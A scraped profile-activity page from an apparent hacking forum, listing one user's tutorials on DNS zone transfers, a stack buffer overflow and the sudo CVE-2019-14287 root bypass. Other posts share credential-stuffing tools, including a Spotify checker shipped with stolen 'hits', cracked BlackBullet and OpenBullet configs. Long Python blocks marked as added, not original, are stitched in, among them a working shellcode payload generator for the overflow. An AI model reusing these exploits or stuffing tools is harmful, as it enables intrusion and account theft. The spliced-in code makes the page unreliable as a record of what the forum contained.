Ichinose

Redactor
  • Content Count: 55
  • Days Won: 28
  • Points: 190,376

Ichinose last won the day on January 1

Ichinose had the most liked content!

Community Reputation: 66 Excellent

1 Follower

About Ichinose
  • Rank: Sensei 〽️
  • Birthday: 07/23/2019

Register Information
  • Birth date: 07/23/00
  • Experience in years: 2
  • Your ambitions: Become a CyberSecurity Expert
  • Your Favorite domains: Python + C + C++ + x86_ASM + HTML/CSS + DLL modding

Recent Profile Visitors

589 profile views
  1. Ichinose

    Introduction - Voex

    Ichinose approved the submission
  2. Ichinose

    Zone transfer DNS

    What is a DNS zone transfer?

    A DNS zone transfer (also called DNS interrogation) is used throughout the whole DNS server hierarchy. Its purpose is to retrieve the IP addresses linked to names. As you may know, the DNS server hierarchy looks like this:

    So the zone transfer lets a domain ask its authoritative name server for its DNS zone, so that the domain can update its own zone through a master/slave relation (axfr means zone transfer type).

    This vulnerability is due to a configuration weakness that allows any host to ask for a zone transfer.

    How to enumerate?

    For the example I'm going to use zonetransfer.me ([Hidden Content]). So first, what we need is a master and a slave. So we have the zone transfer, let's ask it. By using:

    dig ns zonetransfer.me

    I'm asking zonetransfer.me for its master, because I asked for an "ns" (= name server). With the output I get the name servers that handle the website, perfect! So now we can ask the master through the slave by using an axfr request type and no longer ns, because we want a zone transfer. Here we find all the websites associated with zonetransfer.me. We can also use "nslookup" or "host" to do the same!

    doc for dig ==> [Hidden Content]
    doc for host ==> [Hidden Content]
    doc for nslookup ==> [Hidden Content]

    Leave a like
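    The NS lookup and the AXFR request described in the post above, as an added example that is not part of the original post: a small stand-alone DNS client built only on the Python standard library. build_query() writes an NS or AXFR question on the wire, parse_response() reads the answers (following name-compression pointers), and axfr_tcp() runs a zone transfer over TCP the way dig axfr does. The SAMPLE_NS_RESPONSE bytes are constructed here for offline use; the ns1/ns2 names in them are made up and are not zonetransfer.me's real name servers.

```python
"""Added example (not from the original post): minimal DNS NS/AXFR client.
SAMPLE_NS_RESPONSE is constructed; its ns1/ns2 names are made up."""
import socket
import struct

QTYPE = {"A": 1, "NS": 2, "SOA": 6, "AXFR": 252}
TYPE_NAME = {v: k for k, v in QTYPE.items()}


def encode_name(name):
    """'zonetransfer.me' -> b'\\x0czonetransfer\\x02me\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(txid, name, qtype, flags=0x0100):
    """12-byte header (1 question, RD set by default) + question section."""
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE[qtype], 1)


def decode_name(msg, off):
    """Read a name at msg[off], following 0xC0.. compression pointers.
    Returns (name, offset just past the name as it appears in-line)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                 # 2-byte pointer
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (off if end is None else end)


def rcode(msg):
    """Response code from the header flags; 5 = REFUSED."""
    return struct.unpack("!H", msg[2:4])[0] & 0xF


def parse_response(msg):
    """Return [(owner, type, rdata)] for every record after the question."""
    _, _, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                           # skip the echoed question
        _, off = decode_name(msg, off)
        off += 4                                  # qtype + qclass
    records = []
    for _ in range(an + ns + ar):
        owner, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == QTYPE["A"]:
            rdata = ".".join(str(b) for b in msg[off:off + 4])
        elif rtype in (QTYPE["NS"], QTYPE["SOA"]):
            rdata, _ = decode_name(msg, off)      # SOA: only the MNAME
        else:
            rdata = msg[off:off + rdlen]
        records.append((owner, TYPE_NAME.get(rtype, rtype), rdata))
        off += rdlen
    return records


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
    return buf


def axfr_tcp(server, zone, timeout=5):
    """`dig axfr @server zone`: TCP, 2-byte length prefix, keep reading
    messages until the SOA that closes the transfer. A correctly
    restricted server answers REFUSED (rcode 5) instead of sending the zone."""
    query = build_query(0x1234, zone, "AXFR", flags=0)
    records, soa_seen = [], 0
    with socket.create_connection((server, 53), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(query)) + query)
        while soa_seen < 2:
            (length,) = struct.unpack("!H", _recv_exact(s, 2))
            msg = _recv_exact(s, length)
            if rcode(msg) != 0:
                raise PermissionError("zone transfer refused, rcode=%d" % rcode(msg))
            for rec in parse_response(msg):
                records.append(rec)
                soa_seen += rec[1] == "SOA"
    return records


# Constructed sample: an NS answer for zonetransfer.me with two records whose
# owner and rdata use compression pointers (0xC00C) back to the question name.
SAMPLE_NS_RESPONSE = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 2, 0, 0)
    + encode_name("zonetransfer.me") + struct.pack("!HH", QTYPE["NS"], 1)
    + b"\xc0\x0c" + struct.pack("!HHIH", QTYPE["NS"], 1, 7200, 6) + b"\x03ns1\xc0\x0c"
    + b"\xc0\x0c" + struct.pack("!HHIH", QTYPE["NS"], 1, 7200, 6) + b"\x03ns2\xc0\x0c"
)
```

    Live use: take a server name from the NS answer (dig ns zonetransfer.me) and call axfr_tcp(that_server, "zonetransfer.me"). A zone that is configured correctly makes axfr_tcp() raise PermissionError with rcode 5; only a misconfigured server returns the full record list.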
  3. Ichinose

    Buffer Overflow (without ASLR)

    Hi, I'm going to teach you how to exploit a buffer overflow (with ASLR disabled) on Linux. In this tutorial I'll consider that you already have a good understanding of asm registers and gdb commands (like x/xw $register, etc.).

    Requirements?
    - Basic x86 asm (nasm)
    - C
    - Good knowledge of how the RAM is managed by the system when we use a program (how the stack works)
    - Linux basics
    - GDB + peda (how to install gdb + peda); peda is optional

    What does ASLR mean?

    So basically ASLR means "address space layout randomization", but concretely it means that when you start a program, its data will not be stored at the same addresses each time you restart it, like this:

    You can see if ASLR is enabled in "/proc/sys/kernel/randomize_va_space":
    ASLR = 0 ==> disabled
    ASLR = 1 ==> enabled
    ASLR = 2 ==> enabled (default on systems)
    So for this tutorial we'll use ASLR = 0.

    Buffer Overflow?

    Throughout the tutorial we'll use this basic code that takes the argument and prints it. I split it into a function to have a better view when you disassemble the compiled program.

        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>

        void function(char *arg)
        {
            char buffer[64];          /* 64-byte buffer on the stack */
            strcpy(buffer, arg);      /* no length check: a longer argument overflows it */
            printf("%s\n", buffer);
        }

        int main(int argc, char *argv[])
        {
            if (argc != 2) {
                printf("Use '%s <your text>'\n", argv[0]);
                return 0;
            }
            function(argv[1]);
            return 0;
        }

    If we take a look at the function "function", we can see the declaration of a buffer named "buffer" (pretty obvious, right), then with the "strcpy" function we copy the argument "argv[1]" into the buffer (size = 64), then finally we print it. The buffer overflow is about overflowing the buffer to reach the saved eip register. OK, OK, I'll explain.

    When you declare a buffer on the stack, first the system pushes the saved instruction pointer (eip), which will help the program continue its instructions after the function is done, then the saved base pointer (ebp), then the buffer (its size). So the purpose is to rewrite the content of the saved eip to execute a piece of code that we will store in the buffer. But we will not be writing code such as assembly, because from the point of view of the system it reads instructions in opcode format (like when you modify the "hex code" with HxD), so asm code becomes opcode:

        mov ax, 0x0
        leave          ===> \x66\xB8\x00\x00\xC9\xC3
        ret

    But this opcode is too short to fit in a buffer of a greater size, so to fill the buffer + the saved ebp we generally use NOP "\x90" (no operation), which basically means "skip me, I'm useless". So when we debug with gdb, after the exploitation the eip register will contain the address of the buffer, so the program can resume its instructions and execute our code. The code that we inject is called shellcode because it's opcode that corresponds to some assembly code that opens a shell, so if the program has the setuid bit you can get a shell as root and destroy the server/computer.

    To inject our shellcode we need to calculate where the saved eip is. On a 32-bit system registers are 4 bytes long (8 on a 64-bit system), so just add 4 to the end address of the buffer; but more usually we calculate the difference between the start address of the buffer and the eip address, which gives us the size of our shellcode, then you add the buffer address to overwrite the saved eip. (One instruction means one space, so for a buffer of 64 it will be 64 * "\x90", minus the size of the shellcode of course.)

    - Be careful because the addresses can be read reversed, and the reason why ==> [Hidden Content]
    - To find the right shellcode for the system: [Hidden Content]
    - To know the exact architecture of your system: "lscpu"

    This tutorial is only a beginner introduction to buffer overflows; I will maybe make a second one where I go more deeply into the subject, like how to bypass ASLR and so on... Hope you enjoy it, leave a like
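    The payload arithmetic from the post above, as an added example that is not part of the original post, written in Python the way exploit payloads are usually generated on the command line. cyclic_pattern() and find_offset() locate the saved eip from the eip value gdb shows after a crash (an alternative to subtracting addresses by hand), and nop_sled_payload() builds NOP sled + shellcode + return address, packing the address little-endian (the reason it "reads reversed"). The buffer address 0xbffff5c0 and the offset of 68 (64-byte buffer + 4-byte saved ebp) are assumptions for the program above; read the real values from gdb, because the compiler may add padding. SHELLCODE is the well-known 23-byte Linux x86 execve("/bin/sh") shellcode.

```python
"""Added example (not from the original post): payload generation for the
strcpy() overflow. Buffer address and offset are assumptions; read them from gdb."""
import string
import struct

# Well-known 23-byte Linux x86 execve("/bin/sh"): xor eax,eax; push eax;
# push "//sh"; push "/bin"; mov ebx,esp; push eax; push ebx; mov ecx,esp;
# mov al,11; int 0x80. It contains no NUL byte, so strcpy() copies all of it.
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")


def aslr_status(setting):
    """Meaning of the value read from /proc/sys/kernel/randomize_va_space."""
    return {"0": "disabled", "1": "enabled", "2": "enabled (default)"}[setting.strip()]


def cyclic_pattern(length):
    """'Aa0Aa1Aa2...' pattern: every 4-byte window is unique for the lengths
    used here, so the eip value after a crash pins down the offset."""
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for digit in string.digits:
                out += (up + lo + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def find_offset(pattern, crashed_eip):
    """Bytes between the start of the buffer and the saved eip, given the
    eip value gdb shows after running the program on the pattern."""
    return pattern.find(struct.pack("<I", crashed_eip))


def nop_sled_payload(buffer_addr, eip_offset, shellcode=SHELLCODE, bits=32):
    """NOP sled + shellcode, padded to eip_offset bytes, then the address to
    jump to packed little-endian (why it looks reversed in a hex dump).
    Point buffer_addr somewhere inside the sled, not exactly at its start,
    so a small error in the gdb reading still lands on a NOP."""
    if len(shellcode) > eip_offset:
        raise ValueError("shellcode does not fit before the saved eip")
    sled = b"\x90" * (eip_offset - len(shellcode))
    ret = struct.pack("<I" if bits == 32 else "<Q", buffer_addr)
    payload = sled + shellcode + ret
    # strcpy() stops at the first NUL; a NUL as the very last byte is harmless
    # because strcpy() writes its own terminator there anyway.
    if b"\x00" in payload[:-1]:
        raise ValueError("payload contains a NUL byte; strcpy() would truncate it")
    return payload


if __name__ == "__main__":
    import sys
    # Step 1 (in gdb): run $(python3 exploit.py pattern)   -> note eip at the crash
    # Step 2 (in gdb): run $(python3 exploit.py 0xbffff5c0 68)  -> values from step 1
    if sys.argv[1:2] == ["pattern"]:
        sys.stdout.buffer.write(cyclic_pattern(100))
    else:
        addr, off = int(sys.argv[1], 16), int(sys.argv[2])
        sys.stdout.buffer.write(nop_sled_payload(addr, off))
```

    The NUL check matters for this particular program: strcpy() stops at the first zero byte, so a return address such as 0x0804a000 (which packs to 00 a0 04 08) can never be delivered through argv, while a stack address like 0xbffff5c0 (c0 f5 ff bf) can.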
  4. Ichinose

    CVE-2019-14287 sudo vulnerability

    What is the sudo vulnerability?

    So the sudo vulnerability (CVE-2019-14287) is pretty well known. But what is it exactly? As we all know, the sudo command can be used to execute commands as root (not all commands), and if a user is configured as "$USER $HOSTNAME=(ALL, !root) ALL" (it basically means that the user can run any command as any user but not as the root user) in the sudoers file in /etc/, or by writing "sudo visudo" (by the way, it's the most secure way to access the /etc/sudoers file), this user can use the sudo command as another user with the "-u..." parameter. And here is the vulnerability: by default every user can see the /etc/passwd file, which contains all the users and their UID (user ID) on the 3rd separator ":", so with this information we can now exploit it.

    What can you do by exploiting this vulnerability:
    - bypass the root password to execute arbitrary commands.
    - bypass command restrictions (e.g. if a user is configured as "sergent ALL=(ALL, !root) /usr/bin/passwd" in the sudoers file, he can still change his password, and as root).

    How to exploit this vulnerability?

    To see if the target is vulnerable, check the sudo version (sudo -V | grep -i "sudo version"); if the version is under 1.8.28, the target is vulnerable. To exploit it, you have to use the "sudo" command with an invalid user. If you write "sudo -uinvaliduser cat /etc/shadow" it will print an error, so that's why we use the UID: if now we write "sudo -u#-1 cat /etc/shadow", there is no user with the UID -1, and it will let us execute the cat command because the user -1 is invalid.

    How to prevent/fix it?

    The most common way to fix it is to upgrade sudo with a basic "sudo apt-get update && sudo apt-get upgrade". But if, when you use sudo -V | grep -i "sudo version", you still see a version lower than 1.8.28, try sudo apt-get upgrade sudo.

    The last (hypothetical) option is to configure the user like this: "$USER $HOSTNAME=(ALL, !root) ALL, !/usr/bin/sudo", but like that the user won't be able to use sudo anymore. Leave a like, buddy
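    The version check and the sudoers precondition from the post above, as an added example that is not part of the original post: the checks an auditor would script for CVE-2019-14287. parse_sudo_version() reads the output of sudo -V, is_vulnerable() applies the 1.8.28 boundary, rule_is_exposed() flags sudoers rules of the "(ALL, !root)" shape the bug needs, and runas_uid() shows what "-u#-1" turns into. The SAMPLE_SUDO_V and SAMPLE_SUDOERS strings are constructed; the usernames in them are made up.

```python
"""Added example (not from the original post): CVE-2019-14287 audit helpers.
SAMPLE_SUDO_V and SAMPLE_SUDOERS are constructed test data."""
import re
import subprocess

FIXED_IN = (1, 8, 28)


def parse_sudo_version(output):
    """'Sudo version 1.8.27p1' -> (1, 8, 27, 1). Raises ValueError if absent."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", output)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def is_vulnerable(version):
    """Every release before 1.8.28 is affected; the 'p' level does not matter."""
    return tuple(version[:3]) < FIXED_IN


# user host=(runas_users[:runas_groups]) [tags:] commands
RULE_RE = re.compile(r"^\s*([^\s=]+)\s+([^\s=]+)\s*=\s*\(([^)]*)\)\s*(.*)$")


def rule_is_exposed(line):
    """True for rules like 'user host=(ALL, !root) ...': the runas list allows
    ALL and tries to exclude root, which is exactly what -u#-1 sidesteps."""
    if line.lstrip().startswith("#"):
        return False
    m = RULE_RE.match(line)
    if not m:
        return False
    runas_users = [p.strip().split(":")[0].strip() for p in m.group(3).split(",")]
    allows_all = "ALL" in runas_users
    denies_root = any(u in ("!root", "!#0") for u in runas_users)
    return allows_all and denies_root


def exposed_rules(sudoers_text):
    """Every rule in a sudoers file that the bug lets a user bypass."""
    return [line.strip() for line in sudoers_text.splitlines() if rule_is_exposed(line)]


def runas_uid(arg):
    """sudo -u#N passes N to setresuid(). -1 becomes 4294967295 (0xFFFFFFFF),
    the value setresuid() treats as 'leave unchanged', so an unfixed sudo,
    already running as uid 0, simply stays root."""
    if not arg.startswith("#"):
        raise ValueError("numeric runas user must start with '#'")
    return int(arg[1:]) & 0xFFFFFFFF


def check_local_sudo():
    """Run `sudo -V` on this host (needs sudo installed) and classify it."""
    out = subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout
    version = parse_sudo_version(out)
    return version, is_vulnerable(version)


# Constructed samples (not real hosts or users).
SAMPLE_SUDO_V = "Sudo version 1.8.27\nSudoers policy plugin version 1.8.27\n"
SAMPLE_SUDOERS = """\
# constructed sudoers fragment
root ALL=(ALL:ALL) ALL
alice ALL=(ALL) ALL
sergent ALL=(ALL, !root) /usr/bin/passwd
bob myhost=(ALL:ALL, !root) NOPASSWD: ALL
carol ALL=(www-data) /usr/bin/less
"""

if __name__ == "__main__":
    v = parse_sudo_version(SAMPLE_SUDO_V)
    print(v, "vulnerable" if is_vulnerable(v) else "fixed")
    for rule in exposed_rules(SAMPLE_SUDOERS):
        print("exposed:", rule)
```

    Both checks are needed: a host on sudo 1.8.28 or later is safe whatever the sudoers file says, and a vulnerable sudo is only exploitable by users who have a rule that grants ALL runas users while excluding root. "alice ALL=(ALL) ALL" is not "exposed" because it already allows root, and "carol ALL=(www-data) ..." never allowed ALL.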
  5. Ichinose

    CODE FOR SIGN UP CTF_ZONE

    Why did you make a topic? Just PM @AdminSec
  6. Ichinose

    discord Animated avatar on discord without Nitro

    Ah OK, thanks for the info, I will update with a new method as soon as I find one
  7. Prerequisites: [Hidden Content] Setup the apps: [Hidden Content] You can customize it with some other tutorials that I made (to look like a H4xor): [Hidden Content] Leave a like
  8. Ichinose

    BlackBullet 2.1.6 Cracked

    While you wait you can use OpenBullet, it's the better, open-source version of BlackBullet ==> [Hidden Content]
  9. Ichinose

    Introduction - BBSport

    Welcome to you, French buddy
  10. Ichinose

    checker Spectrum Spotify checker

    This is a proxyless Spotify checker, very high CPM. LINK: [Hidden Content] Source Code (C#): [Hidden Content] I left my previous hits in the Export folder. Leave a like
  11. Here is TSP Dork Generator Hot edition. This is a useful tool to make your own dork list. LINKS: [Hidden Content] Leave a like
  12. Ichinose

    multichecker OwnedCracker 37

    Here is OwnedCracker 37, it's another multi-checker tool (no config needed). LINKS: [Hidden Content] If you want free proxies, go to this website: Proxy List. Leave a like
  13. Ichinose

    OB configs (.LOLI)

    I'm sharing some configs with you, make your choice (the configs are not made by me): [Hidden Content] (I will add some from time to time) Leave a like
  14. Ichinose

    Android DLL modding

    Yes, it's not very well known, but it is very effective
  15. Ichinose

    Android DLL modding

    Here is a tutorial for AssemblyCsharp/mscorlib modding (Android game hacking). Link for the pack: [Hidden Content]...